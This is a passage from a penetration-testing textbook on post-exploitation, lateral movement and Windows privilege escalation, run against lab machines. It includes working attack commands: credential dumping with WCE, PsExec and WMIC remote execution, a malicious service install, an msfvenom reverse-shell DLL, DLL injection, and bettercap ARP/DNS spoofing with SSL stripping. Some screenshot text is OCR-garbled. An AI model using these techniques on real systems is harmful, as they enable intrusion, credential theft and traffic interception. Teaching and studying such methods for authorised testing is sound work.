| situational_awareness/network/userhunter situational_awareness/network/stealth_userhunter | Attackers always use this user hunter to identify how many more systems they can log in to with the acquired credentials. Since this will hunt for the user, its sets are logged into a given network. |
| situational_awareness/network/powerview/get_forest | Successful execution of this module will return the forest details. |
| situational_awareness/network/get_exploitable_system | Identifies the vulnerable systems on the network, providing an additional entry point. |
| situational_awareness/network/powerview/ find_localadmin_access get_domain_controller | All of these modules are used to harvest more details |

| get_forest_domain | on the domain trusts, |
|-------------------------|----------------------------|
| get_fileserver | objects, and file servers. |
| find_gpo_computer_admin | |

In this example, we will use the situational_awareness/network/powerview/get_forest module to extract the forest details of a connected domain. A successful run of the modules should disclose the details that are shown in the following screenshot:

(Empire: powershell/situational awareness/network/powerview/get forest) > run

[*] Tasked KT3YW6CN to run TASK CND JOB

[*] Agent KT3YW6CM tasked with task ID 1

[*] Tasked agent KTBYN6CM to run module powershell/situational_awareness/network/powervi (Empire: powershell/situational_awareness/network/powerview/get_forest) > [*] Agent KTBY Job started: %1FY5M

[*] Valid results returned by 192.168.0.115

[*] Agent KT3YW6CM returned results.

| RcotDomainSid | : s-1-5-21-2896800945-2844836275-3805921437 |
|-----------------------|---|
| Name | : Mastering.kali.thirdedition |
| Sites | : [Default-First-Site-Name] |
| Domains | : [Mastering.kali.thirdedition] |
| GlobalCatalogs | : [WIN-BUT(AJ7IDBE.Mastering.kali.thirdedition) |
| ApplicationPartitions | : [DC=DomainDnsZones,DC=Mastering,DC=kali,DC=thirdedition, DC=ForestDnsZones.DC=Mastering.DC=kali.DC=thirdedition} |
| ForestNode | : Windows2008R2Forest |
| RootDomain | : Mastering.kali.thirdedition |
| Schema | : CN=Schema, CN=Configuration, DC=Mastering, DC=kali, DC=thirdedition |
| SchemaRoleOwner | : WIN-3UT0AJ7IDBE.Mastering.kali.thirdedition |
| NamingBoleOwner | : WIN-30TOAJ7IDBE.Mastering.kali.thirdedition |

Get-Forest completed!

In another example, the attacker will always locate systems that have ADMIN\$ and C\$ in them so that it can plant a backdoor or gather information. It can then use these credentials to run the commands remotely.

This can be achieved by using the situational_awareness/network/powerview/share_finder module, as shown in the following screenshot:

| (Empire: powershell/situational_awareness/network/powerview/share_finder) > [*] Agent SRE2N3TM returned results. | | | |
|--|---|--|---|
| Nade | Type | Remark | ComputerName |
| NININȘ Că IPCȘ NETLOGON STSVOL NININȘ CȘ IPCȘ | 2147483648 2147483648 2147483651 0 2147483648 2147483648 2147483648 2147483648 | Renote Admin Default share Renote IPC Logon server share Logon server share Renote Admin Default share Renote IPC | WIN-SUTURITIEBE Mastering kali thirdedition WIN-SUTURITIEBE Mastering kali thirdedition WIN-SUTURITIEBE Mastering kali thirdedition WIN-SUTURITIEBE Mastering kali thirdedition WIN-SUTURITIEBE Mastering kali thirdedition metasploitable3-win2k8 Mastering kali thirdedition metasploitable3-win2k8 Mastering kali thirdedition metasploitable3-win2k8 Mastering kali thirdedition |

PsExec, WMIC, and other tools

PsExec is Microsoft's replacement for Telnet and can be downloaded from https: //technet.microsoft.com/en-us/sysinternals/bb897553.aspx.

The PsExec module is normally utilized by attackers to obtain access to and communicate with the remote system on the network with valid credentials:

```
C:\>C:\Users\V04797X\Downloads\PSTools\PsExec.exe \\192.168.0.166 -u "advanced\
agrant" -p vagrant cmd"
PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
```

Originally, the executable was designed for system internals to troubleshoot any issues with the framework. The same can now be utilized by running the PsExec Metasploit module and performing remote options. This will open up a shell; testers can either enter their username and password or just pass the hash values, so there is no need to crack the password hashes to gain access to the system. Now, all the lateral movement can be performed if a single system is compromised on the network without the need for a password.

The following screenshot provides the Metasploit module of PsExec with valid credentials:

msf exploit(psexec) > show options

Module options (exploit/windows/smb/psexec):

| Name | Current Setting | Required | Description |
|-------------------------|-----------------|----------|---|
| | | | 3.2.3.5.2.2.3.5.3 |
| REOST | 192.168.0.166 | yes | The target address |
| RFORT | 445 | yes | The SMB service port (TCP) |
| SERVICE DESCRIPTION | | no | Service description to to be used on targ |
| SERVICE DISPLAY NAME | | no | The service display name |
| SERVICE NAME | | no | The service name |
| SHARE | ADMIN\$ | yes | The share to connect to, can be an admin |
| mal read/write folder s | hare | | |
| SMEDomain | advanced. | no | The Windows domain to use for authenticat |
| SMBPass | vagrant | no | The password for the specified username |
| SMEUser | vagrant | no | The username to authenticate as |

WMIC

On newer systems, attackers and penetration testers take advantage of built-in scripting languages, such as the **Windows Management Instrumentation Command Line (WMIC)**, a command-line and scripting interface that is used to simplify access to Windows Instrumentation. If the compromised system supports WMIC, several commands can be used to gather information. Refer to the following table:

| Command | Description | |
|---|--|--|
| wmic nicconfig get ipaddress,macaddress | Obtains the IP address and MAC address | |
| wmic computersystem get username | Verifies the account that was compromised | |
| wmic netlogin get name, lastlogon | Determines who used this system last and when they last logged on | |
| wmic desktop get screensaversecure, screensavertimeout | Determines whether the screensavers are password protected and what the timeout is | |
| wmic logon get authenticationpackage | Determines which logon methods are supported | |
| | | |

| wmic process get caption, executablepath,commandline | Identifies system processes |
|---|---|
| wmic process where name="process_name" call terminate | Terminates specific processes |
| wmic os get name, servicepackmajorversion | Determines the system's operating system |
| wmic product get name, version | Identifies installed software |
| wmic product where name="name' call uninstall /nointeractive | Uninstalls or removes defined software packages |
| wmic share get /ALL | Identifies the shares accessible by the user |
| wmic /node:"machinename" path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1" | Starts RDP remotely |
| wmicnteventlog get path, filename,writeable | Finds all of the system event logs and ensures that they can be modified (these are used when it is time to cover your tracks) |

PowerShell is a scripting language built on .NET Framework that runs from a console, giving the user access to the Windows filesystem and objects such as

the registry. It is installed by default on the Windows 7 operating system and higher versions. PowerShell extends the scripting support and automation offered by WMIC by permitting the use of shell integration and interoperability on both local and remote targets.

PowerShell gives testers access to a shell and scripting language on a compromised system. Since it is native to the Windows operating system, its use of commands does not trigger antivirus software. When scripts are run on a remote system, PowerShell does not write to the disk, thus bypassing any antivirus software and whitelisting controls (assuming that the user has permitted the use of PowerShell).

PowerShell supports a number of built-in functions that are referred to as cmdlets. One of the advantages of PowerShell is that cmdlets are aliased to common Unix commands, so entering the 1s command will return a typical directory listing, as shown in the following screenshot:

| C:\>powers Windows Po Copyright | shell owerShell (C) 2009 Micro | soft Corpora | ation. Al | l rights reserved. |
|---------------------------------------|--------------------------------------|--------------|-----------|---------------------|
| PS C:\> 1 | 5 | | | |
| Direct | tory: C:\ | | | |
| Mode | Last | WriteTime | Length | Name |
| | | | | |
| d | 6/21/2016 | 3:58 PM | | Client |
| d | 10/6/2016 | 9:02 AM | | Intel |
| d | 6/22/2017 | 2:16 PM | | N++RECOV |
| d | 8/20/2016 | 8:29 AM | | Out-of-Box Drivers |
| d | 7/14/2009 | 11:20 AM | | PerfLogs |
| d-r | 6/19/2017 | 3:04 PM | | Program Files |
| d-r | 6/19/2017 | 3:04 PM | | Program Files (x86) |
| d | 4/18/2017 | 10:28 AM | | Temp |
| d-r | 2/24/2017 | 11:54 AM | | Users |
| d | 6/19/2017 | 4:38 PM | | Windows |

PowerShell is a rich language that's capable of supporting very complex operations; it is recommended that the user spend time becoming familiar with its use. Some of the simpler commands that can be used immediately following a compromise are described in the following table:

| Command | Description |
|------------------------------|---|
| Get-Host Select Version | Identifies the version of PowerShell that's being used by the victim's system. Some cmdlets are added or invoked in different versions. |
| Get-Hotfix | Identifies the installed security patches and system hotfixes. |
| Get-Acl | Identifies the group names and usernames. |
| Get-Process, Get- Service | Lists the current processes and services. |
| gwmi win32_useraccount | Invokes WMI to list the user accounts. |
| Gwmi_win32_group | Invokes WMI to list the SIDs, names, and domain groups. |

Penetration testers can use Windows native commands, DLLs, .NET functions, WMI calls, and PowerShell cmdlets together to create PowerShell scripts with the .ps1 extension. One such example of lateral movement using WMIC using credentials is when an attacker runs a process on the remote machine to dump a plaintext password from memory. The command to be utilized is as follows:

wmic /USER:"domain\user" /PASSWORD:"Userpassword" /NODE:192.168.0.119 process call creat

Reconnaissance should also extend to the local network. Since you are working blind, you will need to create a map of live systems and subnets that the compromised host can communicate with. Start by entering IFCONFIG (Unix-based systems) or IPCONFIG /ALL (Windows systems) in the shell prompt. This will allow an attacker to determine the following:

- Whether DHCP addressing is enabled.
- The local IP address, which will also identify at least one active subnet.
- The gateway IP address and DNS server address. System administrators usually follow a numbering convention across the network, and if an attacker knows one address, such as gateway server 192.168.0.1, they will ping addresses such as 192.168.0.123, 192.168.0.138, and so on to find additional subnets.
- The domain name that's used to leverage **Active Directory** accounts.

If the attacking system and the target system are using Windows, the net view command can be used to enumerate other Windows systems on the network. Attackers use the netstat -rn command to review the routing table, which may contain static routes to networks or systems of interest.

The local network can be scanned using nmap, which sniffs for ARP broadcasts. In addition, Kali has several tools that can be used for an SNMP endpoint analysis, including nmap, onesixtyone, and snmpcheck.

Deploying a packet sniffer to map traffic will help you identify hostnames, active subnets, and domain names. If DHCP addressing is not enabled, it will also allow attackers to identify any unused, static IP addresses. Kali is preconfigured with Wireshark (a GUI-based packet sniffer), but you can also use tshark in a post-exploitation script or from the command line, as shown in the following screenshot:

root@kali: # tshark -i 1 -VV -w traffic out Running as user "root" and group "root". This could be dangerous. tshark: Lua: Error during loading: [string "/usr/share/wireshark/init.lua"]:44: dofile has been disable wiki.wireshark.org/CaptureSetup/CapturePrivileges for help in running Capturing on 'eth0' ^CFrame 1: 60 bytes on wire (480 bits), 60 bytes captured (480 bits) Interface id: 0 (eth0) Encapsulation type: Ethernet (1) Arrival Time: Jun 12, 2017 01:50:34.755237399 EDT [Time shift for this packet: 0.000000000 seconds] Epoch Time: 1497246634.755237399 seconds [Time delta from previous captured frame: 0.000000000 seconds] [Time delta from previous displayed frame: 0.000000000 seconds] [Time since reference or first frame: 0.000000000 seconds] Frame Number: 1

Windows Credential Editor

Attackers normally utilize the **Windows Credential Editor** (**WCE**) to add, change, list, and obtain NT/LM hashes, as well as list logon sessions. WCE can be downloaded from http://www.ampliasecurity.com/research/windows-credentials-editor/.

Using the Meterpreter shell, you can upload wce.exe to the system that has been compromised, as shown in the following screenshot. Once the file has been uploaded to the system, run the shell command to see whether WCE is successful; running wce.exe -w will list all of the user's logon sessions, along with a plaintext password:

```
meterpreter > upload /root/chap11/wce.exe
[*] uploading : /root/chap11/wce.exe -> wce.exe
   Uploaded 212.00 KiB of 212.00 KiB (100.0%): /root/chap11/wce.exe -> wce.exe
   uploaded : /root/chap11/wce.exe -> wce.exe
meterpreter > shell
Process 4464 created.
Channel 4 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>wce -w
WCe -W
WCE v1.42beta (X64) (Windows Credentials Editor) - (c) 2010-2013 Amplia Security
comì
Use -h for help.
sshd server\METASPLOITABLE3:D@rj33llng
METASPLOITABLE3$\MASTERING:0( ccdK/%aY)bndj9jK30SgsB5-g1u/uFFvxmv-=*534+Cv[Cf?73
.i$(]9Hx]u>,?RX]QSV6:@v !
vagrant\METASPLOITABLE3:vagrant
```

Later, these credentials can be utilized by the attackers to laterally move into the network, thus utilizing the same credentials on multiple systems.

Penetration testers can heavily utilize PowerShell's automated Empire tool to perform attacks that are specific to Active Directory and other domain trust and

privilege escalation attacks, which we will explore in **Chapter 12**, *Privilege Escalation*.

Lateral movement using services

What if penetration testers encounter a system with no PowerShell to invoke? During such cases, SC will be very handy for performing lateral movement in the network for all of the systems that you have access to or systems with anonymous access to the shared folder:

- 1. * net use <code>\\advanced\c\$/user:advanced\username</code> password
- 3. Copy the backdoor that's been created to the shared folder
- 4. Create a service called backtome
- 5. * Sc \\remotehost create backtome binpath="c:\xx\malware.exe"
- 6. Sc remotehost start backtome

Pivoting and port forwarding

We discussed simple ways to port forward the connection in **chapter 9**, *Bypassing Security Controls*, by bypassing content filtering and NAC. In this section, we will use Metasploit's Meterpreter to pivot and port forward on the targets.

In Meterpreter, during an active session on the target systems, attackers can use the same system to scan the internal network. The following screenshot shows a system with two network adapters, 192.168.0.119 and 192.168.52.129:

| meterpreter > shell |
|--|
| Process 784 created. |
| Channel 260 created. |
| Microsoft Windows [Version 6.1.7601] |
| Copyright (c) 2009 Microsoft Corporation. All rights reserved. |
| C:\Windows\system32>ipconfig |
| ipconfig |
| Windows IP Configuration |
| Ethernet adapter Local Area Connection 2: |
| Connection-specific DNS Suffix . : localdomain |
| Link-local IPv6 Address : fe80::5c31:ceb:a751:9035%19 |
| IPv4 Address |
| Subnet Mask |
| Default Gateway |
| Ethernet adapter Local Area Connection: |
| Connection-specific DNS Suffix . : |
| Link-local IPv6 Address : fe80::316d:613f:c225:8f07%11 |
| IPv4 Address |
| Subnet Mask |
| Default Gateway |

However, there is no route for the attacker's IP to reach the internal IP ranges; penetration testers with the Meterpreter session will be able to add the route of the compromised system by running the post-exploit module autoroute by running run post/multi/manage/autoroute in Meterpreter, as shown in the following screenshot. This module will add a new route from the Kali attack box to the internal network by using the compromised machine as the bridge:

| met | erpreter > run post/multi/manage/autoroute |
|-----|---|
| [*] | Running module against VICTIM |
| [*] | Searching for subnets to autoroute. |
| [+] | Route added to subnet 192.168.0.0/255.255.255.0 from host's routing table. |
| [+] | Route added to subnet 192.168.52.0/255.255.255.0 from host's routing table. |

All of the traffic from the attacker's IP to the internal IP range (192.168.0.52.x) will now be routed through the compromised system (192.168.0.x).

We will now background the meterpreter session and try and understand what is beyond the IP range, while also making use of the NetBIOS scanner from Metasploit, but utilizing the following module

use auxiliary/scanner/netbios/nbname

Make sure that you set RHOSTS as the IP range of the internal systems. This will enable the attackers to find more systems on the hopping network, Attackers should be able to see as shown in the following screenshot:

| meterpr | eter | > b | ackgro | und |
|---------|------|-----|--------|-----|
| | | | | |

[*] Backgrounding session 1...

msf exploit(ms17_010_eternalblue) > use auxiliary/scanner/netbios/nbname msf auxiliary(nbname) > set rhosts 192.168.52.0/24

rhosts => 192.168.52.0/24

```
msf auxiliary(nbname) > run
```

[*] Sending NetBIOS requests to 192.168.52.0->192.168.52.255 (256 hosts)
[*] 192.168.52.1 [DESKTOP-GIE32H7] OS:Windows Names: (DESKTOP-GIE32H7, WORKGRO
2.168.232.1, 192.168.52.1, 192.168.0.120) Mac:00:50:56:c0:00:08 Virtual Machi
[*] 192.168.52.129 [VICTIM] OS:Windows Names: (VICTIM, ADVANCED, __MSBROWSE_)
e
[*] 192.168.52.130 [METASPLOITABLE] OS:Unix Names: (METASPLOITABLE, __MSBROWSE_
c:00:00:00:00:00
[*] Scanned 256 of 256 hosts (100% complete)

```
[*] Auxiliary module execution completed
```

Once the systems have been identified using NetBIOS, the next step is to scan the services of the identified hosts for vulnerabilities to achieve the penetration testing goal. A typical move would be to utilize the port scanner in the Metasploit module, as shown in the following screenshot:

| msf msf rhos | <pre>auxiliary(nbname) > u auxiliary(tcp) > set sts => 192.168.52.130</pre> | se rho | auxiliary/scanner/portscan/tcp osts 192.168.52.130 |
|--------------------|--|-----------|---|
| msf | <pre>auxiliary(tcp) > run</pre> | | |
| | | | |
| [*] | 192.168.52.130: | - | 192.168.52.130:25 - TCP OPEN |
| [*] | 192.168.52.130: | | 192.168.52.130:22 - TCP OPEN |
| [*] | 192.168.52.130: | - | 192.168.52.130:23 - TCP OPEN |
| [*] | 192.168.52.130: | _ | 192.168.52.130:21 - TCP OPEN |
| [*] | 192.168.52.130: | - | 192.168.52.130:53 - TCP OPEN |
| [*] | 192.168.52.130: | | 192.168.52.130:80 - TCP OPEN |
| [*] | 192.168.52.130: | - | 192.168.52.130:111 - TCP OPEN |
| [*] | 192.168.52.130: | - | 192.168.52.130:139 - TCP OPEN |
| [*] | 192.168.52.130: | | 192.168.52.130:445 - TCP OPEN |

Using Proxychains

Penetration testers who want to use nmap and other tools to scan the hosts beyond the network can utilize the Metasploit module socks4a by running the following code:

```
msf post(inject_host) > use auxiliary/server/socks4a
msf auxiliary(socks4a) > run
[*] Auxiliary module execution completed
```

Configure the Proxychains configuration after running the module by editing /etc/proxychains.conf and updating the socks4 configuration to port 1080 (or the port number you set in the Metasploit module), as shown in the following screenshot:



Now, the attackers will be able to run nmap directly by running proxychains nmap -vv -sv 192.168.52.129 from the Terminal.

Summary

In this chapter, we focused on the immediate actions that follow the exploitation of a target system. We reviewed the initial rapid assessment that's conducted to characterize the server and the local environment. We also learned how to use various post-exploitation tools to locate target files of interest, create user accounts, and perform horizontal escalation to harvest more information that's specific to other users. We focused on Metasploit's Meterpreter usage, the Empire PowerShell tool, and Crack-Map-Exec so that we could collect more information to perform lateral movement and privilege attacks. We also learned about the usage of the Veil-Pillage framework.

In the next chapter, we will learn how to escalate privileges from that of a normal user to the highest level possible, and also exploit the weaknesses that can be found in an Active Directory environment.

Privilege Escalation

Privilege escalation is the process of going from a relatively low level of access rights to gaining the privileges of an administrator, the system, or even greater access privileges. It allows the penetration tester to own all aspects of a system's operations. More importantly, obtaining some access privileges will allow the tester to control all systems across a network. As vulnerability becomes more difficult to find and exploit, a significant amount of research has been conducted into privilege escalation as a means of ensuring a successful penetration test.

In this chapter, we will look at the following topics:

- Common escalation methodology
- Local system escalation
- DLL injection
- Credential harvesting through sniffing and escalation
- Golden ticket attack on Kerberos
- Active Directory access rights
Overview of the common escalation methodology

Everything that starts with a methodology offers an approach to a problem solution. In this section, we will go through the common escalation methodology utilized by attackers during a red teaming exercise, or penetration testing. The following diagram depicts the methodology that can be used:



In line with the kill-chain methodology, the action of the objective includes escalation of privilege to maintain persistence to the target environment.

The following are the types of user accounts that are found in any target system:

• **Normal user**: Typical access through a backdoor runs at the level of the user who executes the backdoor. These are the normal users of the system (Windows or Unix) and are either local users or domain users with limited

access on the system to perform only tasks that are allowed for them.

- Local administrator: Local administrators are system account holders that have the privilege to run system configuration changes.
- **Delegated administrator**: Delegated administrators are local user accounts with administrator privileges. Example account operators or backup operators are typical groups used in Active Directory environments to delegate administrative tasks.
- **Domain administrator**: Domain administrators are users who can administer the domains that they are a member of.
- Enterprise administrator: Enterprise administrators are accounts that have the most privileges for maintaining the entire forest in an Active Directory.
- Schema administrator: Schema administrators are users who can configure the schema of the forest. The reason schema admins are not included as the most privileged account is because attackers cannot add users to any other groups: that would limit the access level to modifying the Active Directory forest.

Escalating from domain user to system administrator

In most cases, attackers performing console-level attacks or social-engineering attacks might gain access to a normal domain user who is not a local administrator, which leaves them with access only to a limited level of privileges. This can be bypassed and exploited to gain system-level access on the victim machine without having to be a local admin.

When attackers initially gain access to the system and try to run system-level commands, they receive the response access denied Or no privilege available to run the commands on the target system. This can be verified by running the getsystem command from the Meterpreter console, as shown in the following screenshot:

| met | erpreter > getsystem | |
|-----|--|--|
| [-] | <pre>priv_elevate_getsystem: Operation failed:</pre> | |
| [-] | Named Pipe Impersonation (In Memory/Admin) | |
| [-] | Named Pipe Impersonation (Dropper/Admin) | |
| [-] | Token Duplication (In Memory/Admin) | |

In this section, we will explore one vulnerability that exists in Windows 2008 and Windows 7. We will use the latest local exploit, <code>ms18_8120_win32k_privesc</code>, exploiting the Win32k component, which doesn't handle the object's property in memory. You can move the existing Meterpreter session to the background to utilize post exploit modules via the following steps:

```
meterpreter > background
[*] Backgrounding session 1...
msf exploit(multi/handler) > use exploit/windows/local/ms18_8120_win32k_privesc
msf exploit(windows/local/ms18_8120_win32k_privesc) > set session 1
session => 1
msf exploit(windows/local/ms18_8120_win32k_privesc) > exploit
```

Successful exploitation of the vulnerability should open up another shell with a high privilege level, as shown in the following screenshot:



Now the new session must provide you with access to the system level as NT AUTHORITY\SYSTEM, which will enable attackers to create a local administrator-level user as shown in the following screenshot and move laterally by extracting hash dumps using hashdump command from the Meterpreter shell or enable RDP and login with the new admin account:

```
<u>meterpreter</u> > getsystem
... got system via technique 1 (Named Fipe Impersonation (In Memory/Admin)).
meterpreter > shell
Process 5372 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\normaluser>whoam1
whoami
nt authority\system
C:\Users\normaluser>net user Hacker1 Passw0rd123 /add
net user Hacker1 Passw0rd123 /add
The command completed successfully.
C:\Users\normaluser>net localgroup administrators Hackerl /add
net localgroup administrators Hacker1 /add
The command completed successfully.
```

Local system escalation

In the case of Windows 10 or Windows 7, we may be able to run the Meterpreter shell on the context of the user. This can be bypassed by using multiple post-exploit module by sending background to your Meterpreter shell and using any of the following exploit modules depending on the compromised victim machine; in this example, we will utilize the bypassuac post-exploit module, as shown in the following screenshot:

```
meterpreter > background
[*] Backgrounding session 2...
msf exploit(psexec) > use exploit/windows/local/bypassuac
msf exploit(bypassuac) > set session 2
session => 2
```



The bypassuac module in the Meterpreter shell will utilize the existing session to provide a more privileged Meterpreter shell, as shown in the following screenshot:

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin))
meterpreter > shell
Process 4004 created.
Channel 2 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system

Escalating from administrator to system

Administrator privileges allow an attacker to create and manage accounts and access most data available on a system. However, some complex functionality mandates that the requester have system-level access privileges. There are several ways to continue this escalation to the system level. The most common is to use the at command, which is now deprecated due to security reasons and used by Windows to schedule tasks for a particular time. The at command always runs with privileges at the system level; however, these now run in non-interactive mode only:

C:\Windows\system32>at 12:51 /interactive cmd Warning: Due to security enhancements, this task will run at the time expected but not interactively. Use schtasks.exe utility if interactive task is required ('schtasks /?' for details). Added a new job with job ID = 4

Using an interactive shell (enter shell at the Meterpreter prompt), open a Command Prompt and determine the compromised system's local time. If the time is 12:50 (the at function uses the 24-hour notation), schedule an interactive command shell for a later time, as shown in the following screenshot:

C:\Windows\system32>schtasks /Create /SC DAILY /TN hacking /TR cmd.exe /st 12:51 SUCCESS: The scheduled task "hacking" has successfully been created.

After the at task is scheduled to run, reconfirm your access privileges at the Meterpreter prompt, as shown in the following screenshot:

meterpreter > getuid Server username: NT AUTHORITY\SYSTEM

By default, Windows 7 and Windows 2008 don't allow remote access to administrative shares—such as ADMIN\$, c\$, and so on—from untrusted systems. These shares may be required for Meterpreter scripts, such as Incognito, or to support attacks over **Server Message Block** (**SMB**). To address this issue, add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System to the registry, and add a new DWORD (32-bit) key named LocalAccountTokenFilterPolicy and set the value to 1.

An alternative is to run PSEXEC to get system-level access by uploading PSEXEC to the desired folder and run the following command as local administrator:

PsExec -s -i -d cmd.exe

This command should open up another Command Prompt as system user, as shown in the following screenshot:



DLL injection

DLL injection is another easy technique that is utilized by attackers to run remote code in the context of the address space of another process. This process must be running with excess privileges that can then be used to escalate privilege in the form of a DLL file.

Metasploit has a specific module you can use to perform DLL injection. The only thing the attacker needs to do is link the existing Meterpreter session and specify the PID of the process and the path of the DLL.

Upload the DLL from /usr/share/metasploit-framework/data/exploits/CVE-2015-2426/reflective_dll.x64.dll the Meterpreter shell and you should be able to see the file uploaded to the target, as shown in the following screenshot:

```
meterpreter > upload /usr/share/metasploit-framework/data/exploits
meterpreter > upload /usr/share/metasploit-framework/data/exploits
[*] uploading : /usr/share/metasploit-framework/data/exploits/CVE
d11
[*] Uploaded 850.50 KiB of 850.50 KiB (100.0%): /usr/share/metaspl
.x64.dll -> reflective dll.x64.dll
[*] uploaded : /usr/share/metasploit-framework/data/exploits/CVE
d11
meterpreter > shell
Process 5468 created.
Channel 5 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\normaluser>dir
dir
 Volume in drive C is Windows 2008R2
 Volume Serial Number is 54C1-13A3
 Directory of C:\Users\normaluser
12/31/2018 09:38 AM
                       <DIR>
12/31/2018 09:38 AM
                       <DIR>
12/27/2018 06:42 AM
                       <DIR>
                                      Contacts
12/27/2018 08:21 AM
                       <DIR>
                                      Desktop
12/27/2018 06:42 AM
                       <DIR>
                                      Documents
12/27/2018 06:42 AM
                       <DIR>
                                      Downloads
12/27/2018
           06:42 AM
                       <DIR>
                                      Favorites
           06:42 AM
                       <DIR>
                                      Links
12/27/2018
12/27/2018
           06:42 AM
                                      Music
                       <DIR>
12/27/2018 06:42 AM
                       <DIR>
                                      Pictures
12/31/2018 08:59 AM
                              315,904 plink.exe
12/31/2018 09:38 AM
                              870,912 reflective dll.x64.dll
```

Once the file is uploaded, exit the Command Prompt and you will be back to the Meterpreter shell. Now run the ps command to list all the processes. Identify the process ID of the process that runs at the system level; in our example, we will use jmx.exe with the 1624 process ID, and then background the Meterpreter shell by running the background command.

Use the reflective_dll_inject post exploit from the modules by running use post/windows/manage/reflective_dll_inject. After this, set the PATH and SESSION exploit and you should be able to get another reverse shell on Meterpreter in line with the payload.

Another way is to utilize the PowerShell DLL injection module from the Empire tool; you can create a DLL with the payload via msfvenom:

```
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.125 lport=443 -f dll > /
```

From the Empire console, you can select the right process that runs as NT AUTHORITY/SYSTEM:

```
(Empire: 2A54TX1L) > ps
(Empire: 2A54TX1L) > upload /root/chap12/injectme.dll
(Empire: 2A54TX1L) > usemodule code_execution/invoke_dllinjection
(Empire: powershell/code_execution/invoke_dllinjection) > set ProcessID 4060
(Empire: powershell/code_execution/invoke_dllinjection) > set Dll C:\Users\admin\injectm
(Empire: powershell/code_execution/invoke_dllinjection) > run
```

Once the DLL file is injected into a running process, attackers should be able to see an agent reporting back as a privileged user, as shown in the following screenshot:



Once you have successfully invoked the DLL, the payload must be executed and must have opened up a reverse shell as the system-level user, as shown in the following screenshot:

msf exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.1.125:443
[*] Sending stage (206403 bytes) to 192.168.1.115
[*] Meterpreter session 1 opened (192.168.1.125:443 -> 192.168

meterpreter > sessions
Usage: sessions <id>

Interact with a different session Id. This works the same as calling this from the MSF shell: session

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Credential harvesting and escalation attacks

Credential harvesting is the process of identifying usernames, passwords, and hashes that can be utilized to achieve the objective set by the organization for a penetration testing/red team exercise. In this section, we will walk through three different types of credential harvesting mechanism that are typically used by attackers in Kali Linux.

Password sniffers

Password sniffers are a set of tools/scripts that typically perform man-in-themiddle attacks by discovery, spoofing, sniffing the traffic, and by proxying. From our previous experience, we noted that most organizations do not utilize SSL internally; Wireshark revealed multiple usernames and passwords.

In this section, we will explore bettercap to capture SSL traffic on the network so that we can capture the credentials of network users. bettercap is similar to the previous-generation ettercap command, with the additional capability to perform network-level spoofing and sniffing. It can be downloaded to Kali Linux by running apt-get install bettercap from the Terminal. bettercap underwent a lot of development in 2018 to make it compatible with the user interface and enabled caplet use. Caplets are just .cap files that can be scripted to achieve an objective for interactive sessions; this can be updated by a simple command on the Terminal: sudo bettercap -eval "caplets.update; q", similarly to Metasploit's .rc files.

This tool can be utilized for more effective man-in-the-middle attack on a given internal network. In this example, we will utilize one caplet with the following script to capture passwords with an ARP and DNS spoof:

```
net.sniff on
> set http.proxy.sslstrip true
> http.proxy on
> set dns.spoof.domains www.office.com,login.microsoftonline.com,testfire.net
> set dns.spoof.all true
> dns.spoof on
> arp.spoof on
```

bettercap must be able to sniff all the traffic on the target network without any problem, as the following screenshot showcases:



To strip SSL traffic, we can utilize the https.proxy module, as follows:

» net.sniff on » set https.proxy.sslstrip true » https.proxy on » arp.spoof on » hstshijack/hstshijack

The preceding commands in bettercap must enable attackers to see HTTPS traffic, as shown in the following screenshot:



Penetration testers should be careful when using bettercap, as this will pause the entire network your Kali Linux is connected to.

Responder

Responder is an in-built Kali Linux tool for Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) that responds to specific NetBIOS queries based on the file server request. This tool can be launched by running responder -I eth0 (ethernet adapter name of your network that you want to) -h in the Terminal, as shown in the following screenshot:

```
root@kali: # responder -1 eth0 -h
           NBT-NS, LIMNR & MDNS Responder 2.3.3.9
 Author: Laurent Gaffie (laurent.gaffie@gmail.com)
 To kill this script hit CRTL-C
Usage: responder -I eth0 -w -r -f
OF:
responder -I eth0 -wrf
Options:
  -version
                        show program's version number and exit
 -h, --help
                       show this help message and exit
 -A, --analyze
                        Analyze mode. This option allows you to see NBT-NS,
                        BROWSER, LLMNR requests without responding.
 -I eth0, --interface=eth0
                        Network interface to use, you can use 'ALL' as a
                        wildcard for all interfaces
 -i 10.0.0.21, --ip=10.0.0.21
                        Local IP to use (only for OSX)
 -e 10.0.0.22, --externalip=10.0.0.22
                        Poison all requests with another IP address than
                        Responder's one.
 -b, --basic
                        Return a Basic HTTP authentication. Default: NTLM
 -r, --wredir
                        Enable answers for netbios wredir suffix queries.
                        Answering to wredir will likely break stuff on the
```

Responder has the ability to do the following:

- Check for a local host file that includes any specific DNS entries
- Automatically perform a DNS query on the selected network
- Use LLMNR/NBT-NS to send out broadcast messages to the selected network

Attackers on the same network can fire up Responder on the network, as shown in the following screenshot. Responder has the ability to set up multiple server types by itself:

| root@kali:~# responder -I e | eth0 -i 192.168.1.125 |
|--|------------------------------------|
| ··-·-····························· | IIII II |
| NBT-NS, LLMNR & | MDNS Responder 2.3.3.9 |
| Author: Laurent Gaffie (l To kill this script hit C | aurent.gaffie@gmail.com) CRTL-C |
| [+] Poisoners: | |
| LLMNR | [ON] |
| NBT-NS | [0N] |
| DNS/MDNS | [ON] |
| [+] Servers: | |
| HTTP server | [ON] |
| HTTPS server | [ON] |
| WPAD proxy | [OFF] |
| Auth proxy | [OFF] |
| SMB server | [ON] |
| Kerberos server | [ON] |
